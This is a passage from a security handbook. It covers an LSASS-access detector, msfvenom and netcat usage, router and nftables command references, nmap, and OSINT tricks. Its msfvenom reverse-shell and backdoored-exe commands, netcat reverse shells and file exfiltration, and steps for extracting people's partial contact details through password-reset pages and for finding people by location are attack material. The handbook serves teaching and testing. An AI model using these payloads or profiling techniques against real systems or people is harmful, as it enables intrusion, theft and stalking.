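        and image_name(ev.get("TargetImage", "")) == "lsass.exe"
        and image_name(ev.get("SourceImage", "")) not in exclude_sources
    )


def security4656_lsass_handle(ev):
    """Security EventCode 4656: a handle to lsass.exe was requested with 0x143A."""
    return (
        ev.get("EventCode") == "4656"
        and image_name(ev.get("Object_Name", "")) == "lsass.exe"
        and ev.get("Access_Mask", "").lower() == SECURITY_LSASS_MASK
    )


def find_lsass_access(lines):
    """Return (rule, actor) tuples for every event that matches either rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if sysmon10_lsass_access(ev):
            hits.append(("sysmon_10_lsass_access", ev["SourceImage"]))
        elif security4656_lsass_handle(ev):
            hits.append(("security_4656_lsass_handle", ev["Process_ID"]))
    return hits


if __name__ == "__main__":
    for rule, actor in find_lsass_access(SAMPLE_EVENTS):
        print(rule, actor)
```

Both rules key on one exact access mask, so a tool that requests a different mask will not match them; treat the mask as one signal and review every non-system process that opens lsass.exe at all, then tune the exclusion list to the security products actually deployed.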

REFERENCE:
[Link]
[Link]

MSFVENOM
RED TEAM PAYLOADS WINDOWS/LINUX/MacOS
MsfVenom is a Metasploit standalone payload generator as a
replacement for msfpayload and msfencode.

BINARIES
# Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f exe > [Link]
# Creates a simple HTTP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={IP} LPORT={##} -f exe > [Link]
# Creates a simple TCP Shell for Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f elf > [Link]
# Creates a simple TCP Shell for Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho > [Link]
# Creates a simple TCP Payload for Android
msfvenom -p android/meterpreter/reverse_tcp LHOST={IP} LPORT={##} R > [Link]

WEB PAYLOAD
# Creates a simple TCP Shell for PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST={IP} LPORT={##} -f raw > [Link]
# Creates a simple TCP Shell for ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f asp > [Link]
# Creates a simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f raw > [Link]
# Creates a simple TCP Shell for WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f war > [Link]

WINDOWS PAYLOAD
# Lists all available encoders
msfvenom -l encoders
# Binds an exe with a Payload (Backdoors an exe)
msfvenom -x [Link] -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f exe > [Link]
# Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > [Link]
# Binds an exe with a Payload and encodes it
msfvenom -x [Link] -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe > [Link]

MACOS PAYLOAD
msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o /tmp/osxt2
# Creates a Python Shell for Mac
msfvenom -p python/meterpreter/reverse_tcp LHOST=[Link] LPORT=443 > [Link]
# Creates a simple TCP Shell for Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho > [Link]

REFERENCE:
[Link]

NETCAT
RED/BLUE TEAM ADMINISTRATION WINDOWS/LINUX/MacOS
netcat is a command-line or shell application that can be used for
a variety of uses including transferring files, establishing remote
shells, chat, and more!

Port Scan
nc -nvz <IP> <PORT/RANGE>
nc -nvz [Link] 80
nc -nvz [Link] 0-1000

Send File
#Client
nc -lvp <LPORT> > example_sent.txt
#Server
nc -w3 <CLIENT_IP> <PORT> < [Link]

Receive File
#Server
nc -lvp <LPORT> < [Link]
#Client
nc -w3 <SERVER_IP> <PORT> > example_exfil.txt

Execute Remote Script
#Server
nc -lvp <LPORT> -e [Link] <IP>
#Client
nc -nv <SERVER_IP> <PORT>

Encrypted Chat (NCAT)
#Server
ncat -nlvp <LPORT> --ssl
#Client
ncat -nv <SERVER_IP> <PORT>

Banner Grab
nc <TARGET_IP> <PORT>
nc [Link] 80
HEAD / HTTP/1.0
Host: [Link]

Shells/Reverse Shells
nc -e /bin/sh [Link] <LPORT>
nc -e /bin/bash [Link] <LPORT>
nc -c bash [Link] <LPORT>

NETWORK DEVICE_Commands
RED/BLUE TEAM NETWORK DEVICES 4 MODELS

Columns: CISCO IOS XR | JUNIPER JUNOS | NOKIA SROS | HUAWEI HVRP
(cells that themselves contain a pipe are quoted; – means no equivalent)

BASIC
show | show | show | display
exit | exit/up | exit all | quit
run | run | – | –
end | exit | exit all | return
"| include" | "| match" | "| match" | "| include"
… formal | "| display-set" | – | –
reload | request system reboot | admin reboot now | reboot

GENERAL CONFIG
show running-config | show configuration | admin display-config | display current-configuration
show startup-config | – | – | display saved-configuration
configure terminal | configure / edit | configure system | system view
hostname hostname | system host-name hostname | name systemname | sysname systemname
show (after conf change) | show | compare | info (after conf change) | –
commit | commit | admin save | save
shutdown | disable | shutdown | shutdown
no shutdown | delete interfaces x disable | no shutdown | undo shutdown
no | delete | no | undo

SHOW
show clock | show system uptime | show system time | display clock
show ntp status | show ntp status | show system ntp status | display ntp-service
show history | show cli history | show history | display history-command
show platform | show chassis fpc | show card, show mda | display device pic-status
admin show platform | show chassis fpc detail | show card detail, show mda detail | display device
show environment | show chassis environment | – | –
show inventory | show chassis hardware | – | –
admin show environment | include PM | show chassis hardware | match PSM | show chassis environment power-supply | display power
show diags | show chassis hardware | show chassis environment | –
show memory summary | show chassis routing engine | show system memory-pools | display memory-usage
show processes cpu | show system processes extensive | show system cpu | display cpu-usage
show users | show system users | show system users | display users
show version | show version | show version | display version
show license | – | – | display license
– | show system alarms | show system alarms | display alarm all / active
– | show chassis alarms | – | –
show arp | show arp | show router arp | display arp all
show interface | show interfaces | show router interface | display ip interface
show interface interface | show interfaces interface | show port port | display ip interface interface
show interface interface statistics | – | show port port statistics | –
show interface brief | show interface terse | show router interface summary | display ip interface brief
show policy-map | show class-of-service interface | show router policy | –
show policy-map interface | show interfaces queue | – | –
show route | show route | show router route-table | display ip routing-table
show route summary | show route summary | show router route-table summary | –
show route ipv6 | show route table inet6.0 | show router route-table ipv6 | display ipv6 routing-table
show route-map | show policy | show router policy | display route-policy
show snmp | show snmp statistics | show snmp counters | display snmp statistics
show tcp | show system connections | show system connections | display tcp statistics
show ipv4 traffic | show system statistics | – | display ip statistics
show protocols | show route protocol | – | –
show flash | show flash | file (+ dir) | dir flash:
show filesystem | show system storage | – | dir
show bfd session | show bfd session | show router bfd session | display bfd session all
show bfd interfaces location x | – | show router bfd interface | display bfd interface
show interfaces be x | show interfaces aex | show lag x | display interface Eth-Trunk x
show interfaces be x details | show interfaces aex details | show lag x detail | –
– | – | show lag x associations | –

TROUBLESHOOT
ping ip_address | ping ip_address | ping ip_address | ping ip_address
traceroute ip_address | traceroute ip_address | traceroute ip_address | tracert ip_address
debug | debug | debug | debugging
no debug | undebug all | no debug | undo debugging
monitor interface interface | monitor interface interface | monitor port port | –
terminal monitor | monitor start messages | – | terminal monitor / terminal trapping
terminal monitor disable | monitor stop messages | – | undo terminal monitor
show tech-support | request support info | admin tech-support | display diagnostic-information
show logging | show log messages | show log log-id 99 (all) | display logbuffer
show controllers interface | show interfaces diagnostic optics interface | – | display controller
show access-lists | show firewall | show filter ip x | display acl x

CLEAR
clear | clear | clear | reset
clear counters interface | clear interface statistics interface | clear counter interface xx | reset counters interface xx
clear arp-cache | clear arp | clear router arp | reset arp
clear cef | – | – | reset ip fast-forwarding / reset ip forwarding-table
clear route * | clear ip route | clear router statistics route-adv | protocol all
clear access-list counters | clear firewall | clear filter | –
clear line line | request system logout username | – | –

OSPF
show ospf (summary) | show ospf overview | show router ospf status | display ospf brief
show ospf database | show ospf database | show router ospf database | display ospf lsdb
show ospf interface | show ospf interface | show router ospf interface | display ospf interface
show ospf neighbor | show ospf neighbor | show router ospf neighbor | display ospf nexthop
show route ospf | show route protocol ospf | show router ospf routes | display ip routing-table protocol ospf
show ospf virtual-links | – | show router ospf virtual-link | display ospf vlink
show ospf statistics | show ospf statistics | show router ospf statistics | display ospf statistics

ISIS
show isis interface | show isis interface | show router isis interface | display isis interface
show clns neighbor | show isis adjacency | show router isis adjacency | display isis peer
show isis database | show isis database | show router isis database | display isis lsdb
show isis topology | show isis topology | show router isis topology | –
show isis routes | show isis route | show router isis routes | display isis route
show isis spf-log | show isis spf log | show router isis spf-log | display isis spf-log
show isis statistics | show isis statistics | show router isis statistics | display isis statistics
clear clns neighbors | clear isis adjacency | clear router isis adjacency | –
clear isis * | clear isis database | clear router isis database | –
clear isis statistics | clear isis statistics | clear router isis statistics | –

BGP
show bgp | show route protocol bgp | show router bgp routes | display bgp routing-table
show bgp community | show route community | – | –
show bgp neighbors | show bgp neighbor | show router bgp neighbor | display bgp peer
show bgp peer-group | show bgp group | show router bgp group | display bgp group
show bgp summary | show bgp summary | show router bgp summary | display bgp peer
show route bgp | show route protocol bgp | show router bgp routes | display ip routing-table protocol bgp
clear bgp | clear bgp neighbor | clear bgp | reset bgp all
clear bgp nexthop registration | clear bgp neighbor | clear bgp next-hop | –

MPLS
show mpls interface | show mpls interface | show router mpls interfaces | display mpls interface
show mpls ldp summary | show ldp overview | show mpls ldp summary | display mpls ldp all
show mpls ldp interface | show mpls ldp interface | show router ldp interface | display mpls ldp interface
show mpls ldp bindings | – | show router ldp bindings | –
show mpls ldp neighbor brief | show ldp neighbor | show router ldp session | display mpls ldp adjacency
show rsvp interface | show rsvp interface | show router rsvp interface | display mpls rsvp-te interface
show rsvp neighbors | show rsvp neighbor | show router rsvp neighbors | display mpls rsvp-te peer
show rsvp session | show rsvp session | show router rsvp session | display mpls rsvp-te session x
show rsvp counters | show rsvp statistics | show router rsvp statistics | display mpls rsvp-te statistics global

MULTICAST
show mfib/mrib route | show multicast route | show mfib/mrib route | display multicast routing-table
– | show multicast statistics | – | display multicast flow-statistic
show pim interface | show pim interfaces | show router pim interfaces | display pim interface
show pim neighbor | show pim interfaces | show router pim neighbor | display pim neighbor
show pim group-map | show pim group | show router pim group | –
show ip pim rp mapping | show pim rps | show router pim rp | display pim rp-info
show pim traffic | show pim statistics | show router pim statistics | –
show mroute | show mfib | – | display multicast routing-table
show igmp interface | show igmp interface | show router igmp interface | display igmp interface
show igmp groups | show igmp group | show router igmp group | –
show igmp traffic | show igmp statistics | show router igmp statistics | –
show mld interface | show mld interface | show router mld interface | display igmp interface
show mld groups | show mld group | show router mld group | display igmp group
show mld traffic | show mld statistics | show router mld statistics | –

VRRP
show vrrp interface interface | show vrrp interface interface | show router vrrp instance interface | display vrrp interface interface
show vrrp status | show vrrp brief | – | display vrrp brief
show vrrp summary | show vrrp summary | – | –
show vrrp statistics | – | show vrrp statistics | display vrrp statistics

REFERENCE:
[Link]
[Link]

NFTABLES
RED/BLUE TEAM FIREWALL LINUX
nftables (netfilter tables) is the successor to iptables. It
replaces the existing iptables, ip6tables, arptables and ebtables
framework.

TABLES
ip Used for IPv4 related chains
ip6 Used for IPv6 related chains
arp Used for ARP related chains
bridge Used for bridging related chains
inet Mixed ipv4/ipv6 chains

CHAINS
filter for filtering packets
route for rerouting packets
nat for performing Network Address Translation
HOOKS
prerouting This is before the routing decision; all packets entering the machine hit this chain
input All packets for the local system hit this hook
forward Packets not for the local system, those that need to be forwarded, hit this hook
output Packets that originate from the local system pass this hook
postrouting This hook is after the routing decision; all packets leaving the machine hit this chain
RULES
ip IP protocol
ip6 IPv6 protocol
tcp TCP protocol
udp UDP protocol
udplite UDP-lite protocol
sctp SCTP protocol
dccp DCCP protocol
ah Authentication headers
esp Encrypted security payload headers
ipcomp IPcomp headers
icmp icmp protocol
icmpv6 icmpv6 protocol
ct Connection tracking
meta Meta properties such as interfaces
MATCHES
MATCH DESCRIPTION
ip
version Ip Header version
hdrlength IP header length
tos Type of Service
length Total packet length
id IP ID
frag-off Fragmentation offset
ttl Time to live
protocol Upper layer protocol
checksum IP header checksum
saddr Source address
daddr Destination address
ip6
version IP header version
priority
flowlabel Flow label
length Payload length
nexthdr Next header type (Upper layer protocol number)
hoplimit Hop limit

saddr Source Address
daddr Destination Address
tcp
sport Source port
dport Destination port
sequence Sequence number
ackseq Acknowledgement number
doff Data offset
flags TCP flags
window Window
checksum Checksum
urgptr Urgent pointer
udp
sport Source port
dport destination port
length Total packet length
checksum Checksum
udplite
sport Source port
dport destination port
cscov Checksum coverage
checksum Checksum
sctp
sport Source port
dport destination port
vtag Verification tag
checksum Checksum
dccp
sport Source port
dport Destination port
ah
nexthdr Next header protocol (Upper layer protocol)
hdrlength AH header length
spi Security Parameter Index
sequence Sequence Number
esp
spi Security Parameter Index
sequence Sequence Number
ipcomp
nexthdr Next header protocol (Upper layer protocol)
flags Flags
cfi Compression Parameter Index
icmp
type icmp packet type
icmpv6
type icmpv6 packet type
ct
state State of the connection
direction Direction of the packet relative to the connection
status Status of the connection

mark Connection mark
expiration Connection expiration time
helper Helper associated with the connection
l3proto Layer 3 protocol of the connection
saddr Source address of the connection for the given direction
daddr Destination address of the connection for the given direction
protocol Layer 4 protocol of the connection for the given direction
proto-src Layer 4 protocol source for the given direction
proto-dst Layer 4 protocol destination for the given direction
meta
length Length of the packet in bytes: meta length > 1000
protocol ethertype protocol: meta protocol vlan
priority TC packet priority
mark Packet mark
iif Input interface index
iifname Input interface name
iiftype Input interface type
oif Output interface index
oifname Output interface name
oiftype Output interface hardware type
skuid UID associated with originating socket
skgid GID associated with originating socket
rtclassid Routing realm
STATEMENTS
accept Accept the packet and stop the ruleset evaluation
drop Drop the packet and stop the ruleset evaluation
reject Reject the packet with an icmp message
queue Queue the packet to userspace and stop the ruleset evaluation
continue
return Return from the current chain and continue at the next rule of the last chain. In a base chain it is equivalent to accept
jump <chain> Continue at the first rule of <chain>. It will continue at the next rule after a return statement is issued
goto <chain> After the new chain the evaluation will continue at the last chain instead of the one containing the goto statement

Initial setup: for an iptables-like chain setup, use the ipv4-filter
file provided in the source:
nft -f files/nftables/ipv4-filter

List the resulting chain:
nft list table filter
Note that filter as well as output or input are used as chain and
table name. Any other string could have been used.

BASIC RULES HANDLING

Drop output to a destination:
nft add rule ip filter output ip daddr [Link] drop

Rule counters are optional with nftables. The counter keyword needs to
be used to activate them:
nft add rule ip filter output ip daddr [Link] counter drop

Add a rule to a network:
nft add rule ip filter output ip daddr [Link]/24 counter

Drop packets to port 80:
nft add rule ip filter input tcp dport 80 drop

Accept ICMP echo request:
nft add rule filter input icmp type echo-request accept

Combine filters by specifying the ip syntax multiple times:
nft add rule ip filter output ip protocol icmp ip daddr [Link] counter drop

Delete all rules in a chain:
nft delete rule filter output

To delete a specific rule, use the -a flag on nft to get the handle number:
# nft list table filter -a
table filter {
chain output {
ip protocol icmp ip daddr [Link] counter packets 5 bytes 420 drop # handle 10
...
Then delete rule 10 with:
nft delete rule filter output handle 10

Flush the filter table:
nft flush table filter

Insert a rule:
nft insert rule filter input tcp dport 80 counter accept

Insert or add a rule at a specific position. Get the handle of the rule
before or after which to insert or add the new one using the -a flag:
# nft list table filter -n -a
table filter {
chain output {
type filter hook output priority 0;
ip protocol tcp counter packets 82 bytes 9680 #
handle 8
ip saddr [Link] ip daddr [Link] drop #
handle 7
}
}

nft add rule filter output position 8 ip daddr [Link] drop

This adds a rule after the rule with handle 8:
# nft list table filter -n -a
table filter {
chain output {
type filter hook output priority 0;
ip protocol tcp counter packets 190 bytes 21908 #
handle 8
ip daddr [Link] drop # handle 10
ip saddr [Link] ip daddr [Link] drop #
handle 7
}
}

Add before the rule with a given handle:
nft insert rule filter output position 8 ip daddr [Link] drop

Match filter on a protocol:
nft insert rule filter output ip protocol tcp counter
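The handle workflow above (list with -a, then delete or insert by handle) is easy to script. The following is an added example, not from the handbook or the nftables project: a Python helper that parses the text printed by `nft -a list table ...` (the listing here is constructed to match the shape shown above; packet and byte counts are made up), returns the handle of a given rule, and builds the matching delete/insert command.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of `nft -a list table ip filter` output (not real router data).
SAMPLE_LISTING = """\
table ip filter {
    chain input {
        type filter hook input priority 0; policy drop;
        ct state established,related accept # handle 4
        iif "lo" accept # handle 5
        tcp dport 22 counter packets 10 bytes 640 accept # handle 6
    }
    chain output {
        type filter hook output priority 0;
        ip protocol tcp counter packets 82 bytes 9680 # handle 8
        ip saddr 10.0.0.5 ip daddr 192.0.2.10 drop # handle 7
    }
}
"""

CHAIN_RE = re.compile(r"^\s*chain\s+(?P<name>\S+)\s+\{")
RULE_RE = re.compile(r"^\s*(?P<rule>.+?)\s+#\s+handle\s+(?P<handle>\d+)\s*$")
# Live counters change between listings, so they are normalised away for matching.
COUNTER_RE = re.compile(r"\s*counter packets \d+ bytes \d+")


def parse_handles(listing: str) -> Dict[str, List[Tuple[int, str]]]:
    """Map each chain name to its [(handle, rule text)] pairs in listing order."""
    chains: Dict[str, List[Tuple[int, str]]] = {}
    current: Optional[str] = None
    for line in listing.splitlines():
        m = CHAIN_RE.match(line)
        if m:
            current = m.group("name")
            chains[current] = []
            continue
        if line.strip() == "}":
            current = None  # closes the current chain (or the table)
            continue
        m = RULE_RE.match(line)
        if m and current is not None:
            rule = COUNTER_RE.sub(" counter", m.group("rule"))
            chains[current].append((int(m.group("handle")), rule))
    return chains


def find_handle(listing: str, chain: str, rule: str) -> Optional[int]:
    """Handle of the rule whose text equals `rule` (counter statistics ignored)."""
    for handle, text in parse_handles(listing).get(chain, []):
        if text == rule:
            return handle
    return None


def delete_command(table: str, chain: str, handle: int) -> str:
    """nft command that deletes the rule with this handle."""
    return f"nft delete rule {table} {chain} handle {handle}"


def insert_before_command(table: str, chain: str, handle: int, rule: str) -> str:
    """nft command that inserts `rule` before the rule with this handle
    (use `add rule ... position` instead to place it after)."""
    return f"nft insert rule {table} {chain} position {handle} {rule}"


if __name__ == "__main__":
    h = find_handle(SAMPLE_LISTING, "output", "ip saddr 10.0.0.5 ip daddr 192.0.2.10 drop")
    print(delete_command("filter", "output", h))
```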

IPv6
Create IPv6 chains with filter in source:
nft -f files/nftables/ipv6-filter

Add rule:
nft add rule ip6 filter output ip6 daddr [Link] counter

List the rules:
nft list table ip6 filter

Accept dynamic IPv6 configuration & neighbor discovery:
nft add rule ip6 filter input icmpv6 type nd-neighbor-solicit accept
nft add rule ip6 filter input icmpv6 type nd-router-advert accept

Connection tracking: accept all incoming packets of an established
connection:
nft insert rule filter input ct state established accept

Filter on interface: accept all packets going out of the loopback
interface:
nft insert rule filter output oif lo accept

And for packets coming in on eth2:
nft insert rule filter input iif eth2 accept

REFERENCE:
[Link]
[Link]
[Link]

NMAP
RED/BLUE TEAM RECON/ASSET DISCOV WINDOWS/LINUX/MacOS
Nmap (Network Mapper) is a free and open-source network scanner and
is used to discover hosts and services on a computer network by
sending packets and analyzing the responses.

COMMAND    DESCRIPTION
nmap [Link]    Scan a single IP
nmap [Link]    Scan a host
nmap [Link]-20    Scan a range of IPs
nmap [Link]/24    Scan a subnet
nmap -iL [Link]    Scan targets from a text file
nmap -p 22 [Link]    Scan a single Port
nmap -p 1-100 [Link]    Scan a range of ports
nmap -F [Link]    Scan 100 most common ports (Fast)
nmap -p- [Link]    Scan all 65535 ports
nmap -sT [Link]    Scan using TCP connect
nmap -sS [Link]    Scan using TCP SYN scan (default)
nmap -sU -p 123,161,162 [Link]    Scan UDP ports
nmap -Pn -F [Link]    Scan selected ports - ignore discovery
nmap -A [Link]    Detect OS and Services
nmap -sV [Link]    Standard service detection
nmap -sV --version-intensity 5 [Link]    More aggressive Service Detection
nmap -sV --version-intensity 0 [Link]    Lighter banner grabbing detection
nmap -oN [Link] [Link]    Save default output to file
nmap -oX [Link] [Link]    Save results as XML
nmap -oG [Link] [Link]    Save results in a format for grep
nmap -oA outputfile [Link]    Save in all formats
nmap -sV -sC [Link]    Scan using default safe scripts
nmap --script-help=ssl-heartbleed    Get help for a script
nmap -sV -p 443 --script=ssl-[Link] [Link]    Scan using a specific NSE script
nmap -sV --script=smb* [Link]    Scan with a set of scripts
nmap --script=http-title [Link]/24    Gather page titles from HTTP services
nmap --script=http-headers [Link]/24    Get HTTP headers of web services
nmap --script=http-enum [Link]/24    Find web apps from known paths
nmap --script=asn-query,whois,ip-geolocation-maxmind [Link]/24    Find Information about IP address
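Added example, not from the handbook or the Nmap project: a Python parser for the grepable (-oG) output format produced by the commands above, extracting open ports with their detected service and version, and diffing two scans to flag newly exposed services, which is the blue-team use of the asset discovery commands. The .gnmap lines are constructed; hosts, hostnames and banners are made up.

```python
import re
from typing import List, NamedTuple

# Constructed sample of nmap -oG output (one "Ports:" line per host that is up).
# Each port entry is port/state/proto/owner/service/rpc/version/ and entries are
# comma separated; nmap replaces "/" inside version strings with "|" so the
# field regex below stays unambiguous even when a banner contains commas.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Thu Apr  2 10:00:00 2020 as: nmap -sV -oG scan.gnmap 192.0.2.0/28
Host: 192.0.2.10 (web01.example.test)\tStatus: Up
Host: 192.0.2.10 (web01.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 80/open/tcp//http//nginx 1.14.2/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.0.2.11 ()\tStatus: Up
Host: 192.0.2.11 ()\tPorts: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (999)
Host: 192.0.2.12 ()\tStatus: Down
# Nmap done at Thu Apr  2 10:01:00 2020 -- 16 IP addresses (2 hosts up) scanned in 60.00 seconds
"""

# Constructed earlier scan of the same range, used as the baseline for the diff.
BASELINE_GNMAP = """\
Host: 192.0.2.10 (web01.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 80/open/tcp//http//nginx 1.14.2/\tIgnored State: filtered (998)
Host: 192.0.2.11 ()\tStatus: Down
"""

PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


class OpenPort(NamedTuple):
    host: str
    port: int
    proto: str
    service: str
    version: str


def parse_gnmap(text: str) -> List[OpenPort]:
    """Return every open port found in grepable nmap output, in file order."""
    found: List[OpenPort] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and anything unexpected
        # Fields are tab separated, each "Name: value"; the Ports field may be absent.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split(" ", 1)[0]  # drop the "(hostname)" part
        for m in PORT_RE.finditer(fields.get("Ports", "")):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service, version))
    return found


def new_exposures(baseline: str, current: str) -> List[OpenPort]:
    """Open ports present in `current` but not in `baseline` (version strings ignored)."""
    key = lambda p: (p.host, p.port, p.proto)
    seen = {key(p) for p in parse_gnmap(baseline)}
    return [p for p in parse_gnmap(current) if key(p) not in seen]


if __name__ == "__main__":
    for p in new_exposures(BASELINE_GNMAP, SAMPLE_GNMAP):
        print(f"NEW {p.host}:{p.port}/{p.proto} {p.service} {p.version}")
```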

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]

OSINT_Techniques
OSINT ENUMERATION N/A

GAP ANALYSIS METHODOLOGY
Gap analysis takes stock of the initial information that you have
and then applies four simple questions to identify what to do next.
This can be applied to bring structure and order to your OSINT
research. The four questions are:

1) What do I know?
2) What does this mean?
3) (So) What do I need to know?
4) How do I find out?

REFERENCE:
[Link]
4th-march-2020/

PASSWORD RESET
There is a lack of standardization in how password reset functions are
implemented, which can be used to obtain the partial telephone numbers
and emails of target accounts.

FACEBOOK: You will be met with a screen displaying alternative
contact methods that can be used to reset the password as seen in
the post above. It also accurately uses the number of asterisks
that match the length of the email addresses.

GOOGLE: You will be asked to enter the last password remembered,
which can be anything you want, and the next screen will display a
redacted recovery phone number with the last 2 digits if one is on
file.

TWITTER: Entering a Twitter username will yield a redacted email
address on file with the first 2 characters of the email username
and the first letter of the email domain. It also accurately uses
the number of asterisks that match the length of the email address.

YAHOO: Will display a redacted alternate email address if on file.
Displays accurate character count as well as first character and
last 2 characters of email username along with full domain.

MICROSOFT: Displays redacted phone number with last 2 digits.

PINTEREST: Displays a user's profile as well as a redacted email
address without an accurate character count.

INSTAGRAM: Automatically initiates a reset and emails the user. Do
not use.

LINKEDIN: Automatically initiates a reset and emails the user. Do
not use.

FOURSQUARE: Automatically initiates a reset and emails the user. Do
not use.

REFERENCE:
[Link]

REVERSE IMAGE SEARCHING
TIP: Crop the image to only the object/person you are interested in
finding before uploading to increase accuracy.
TIP: Increase the resolution of your image even if it becomes more
pixelated.
TIP: Best reverse image search engines in order: Yandex, Bing,
Google, TinEye.

Yandex Images
[Link]
Выберите файл (Choose file)
Введите адрес картинки (Enter image address)
Найти (Search)
Похожие картинки (Similar images)
Ещё похожие (More similar)

BING "Visual Search"
[Link]

GOOGLE Images
[Link]

TinEye
[Link]

REFERENCE:
[Link]
reverse-image-search-for-investigations/
[Link]
[Link]
geoprofiling-and-imagery-analysis-6f16bbd5c219

RECENT SATELLITE IMAGERY
To pull/view the most recent satellite imagery for:

GOOGLE EARTH Explore New Satellite Imagery Tool
Browse the following:
[Link]
1530.56420216a,14967606.11368418d,35y,-
0h,0t,0r/data=CiQSIhIgOGQ2YmFjYjU2ZDIzMTFlOThiNTM2YjMzNGRiYmRhYTA

MAPBOX LIVE
Browse the following:
[Link]
[Link]?title=true&access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpejY4
M29iazA2Z2gycXA4N2pmbDZmangifQ.-g_vE53SD2WrJ6tFX7QHmA#4.14/48.73/-
78.55

REFERENCE:
[Link]
[Link]
satellite-imagery/
[Link]
and-machine-learning/
[Link]

CALCULATE PHOTO APPROX TIME OF DAY
When reviewing a photo, calculate the approximate time of day from the
position of the sun, if you know or can guess the approximate location,
with the tools below:
[Link]
[Link]

REFERENCE:
[Link]

FIND TELEGRAM GROUPS BY LOCATION
1. Use a mobile phone / Android Emulator
2. Download a GPS-spoofer
3. Spoof location to target location
4. Open up Telegram
5. Click on three dots
6. Click on "Contacts"
7. Click on "Add people nearby"
8. Have fun!

REFERENCE:
[Link]

FIND TWITTER ACCOUNTS BY EMAIL
1. Sign in on Gmail
2. Open "Contacts"
3. Add email address of target
4. Sign in on Twitter
5. Download "GoodTwitter" add-on
6. Open privacy settings
7. Click "Find friends"
8. Upload Gmail contacts
9. Have fun!

REFERENCE:
[Link]

FIND TWEETS BASED ON LOCATION
1. Find location in Google Maps
2. Right click > "What's here?"
3. Click on GPS coordinates
4. Copy GPS coordinates
5. Go to [Link]
6. Use "geocode:LATT,LONG,0.1km"
7. Have fun!

REFERENCE:
[Link]

SPOOF BROWSER LOCATION GOOGLE CHROME
1. Open dev tools (F12)
2. Click on "Console" tab
3. Click on "ESC" button = "console drawer"
4. Click on "Sensors"
5. Select location/fill in coordinates
6. Have fun!
NOTE: IP address might still reveal your location!

REFERENCE:
[Link]

TikTok PROFILES JSON FORMAT!
1. Navigate to
[Link]
2. replace {username} with username of target
3. Have fun!
> Find profile pic in 720x720 format
> Find follower/liker count
& Scrape it!

Want it in 1080x1080 format?

1. Go to TikTok profile [Link]
2. Open dev tools (F12)
3. Click on "Network tab"
4. Refresh page (F5)
5. Select "XHR" tab
6. Double click on "api/user/detail/"
7. Open "AvatarLarger" link
8. Have fun!

REFERENCE:
[Link]

FICTIONAL ACCOUNT CREATION
Autogenerate fictional personas with the below online tools:

This Person Does Not Exist
[Link]

This Resume Does Not Exist
[Link]

This Rental Does Not Exist
[Link]

Fake Name Bio Generator
[Link]

Random User Generator
[Link]

Fake User Generator
[Link]

Dating Profile Generator
[Link]

Fake Persona Generator
[Link]

International Random Name Generator
[Link]

OSINT_Tools
OSINT MISC ONLINE
Online tools broken into categories based on selector search.

ADDRESS
Fast People Search [Link]
GeoNames [Link]
People Finder [Link]/reverse-address-[Link]

People Search Now [Link]
True People Search [Link]
White Pages [Link]
ANON SEARCH
DuckDuckGo [Link]
Start Page [Link]
Qwant [Link]
BOT/TROLL
Bot Sentinel [Link]
Botometer [Link]
Emergent [Link]
Faker Fact [Link]/try-it-out
Hoaxy [Link]
Iffy Quotient [Link]/plaform-health-metrics
Information Operations Archive [Link]
Twitter Trails [Link]
DOMAIN
Analyze ID [Link]
DNS Trails [Link]
Domain Big Data [Link]
DomainIQ [Link]/snapshot_history
DNS Trails [Link]
Spyse [Link]
ViewDNS Whois [Link]
Whoismind [Link]
Whoisology [Link]
Whoxy [Link]/reverse-whois
EMAIL
Cynic [Link]
Dehashed [Link]
Email Format [Link]
Email Hippo [Link]
Ghost Project [Link]
HaveIBeenPwned [Link]
Hunter [Link]
IntelligenceX [Link]
Leak Probe [Link]
Leaked Source [Link]
Many Contacts [Link]/en/mail-check
PasteBinDump [Link]
Public Mail Records [Link]
Simple Email Reputation [Link]
Spycloud [Link]
Spytox [Link]
TruMail [Link]
Verify Email [Link]
FORENSICS
ExifData [Link]

Extract Metadata [Link]
Foto Forensics [Link]
Forensically [Link]/photo-forensics
MetaPicz [Link]
Image Verification reveal-[Link]/reveal/[Link]
WayBack Machine [Link]
IMAGE
Baidu Images [Link]
Bing Images [Link]/images
Google Images [Link]
Karma Decay (Reddit) [Link]
TinEye [Link]
Yandex Images [Link]
INFRASTRUCTURE
Analyze ID [Link]
Backlink Checker [Link]/backlink-checker
Built With [Link]
Carbon Dating [Link]
Censys [Link]
Certificate Transparency Logs [Link]
DNS Dumpster [Link]
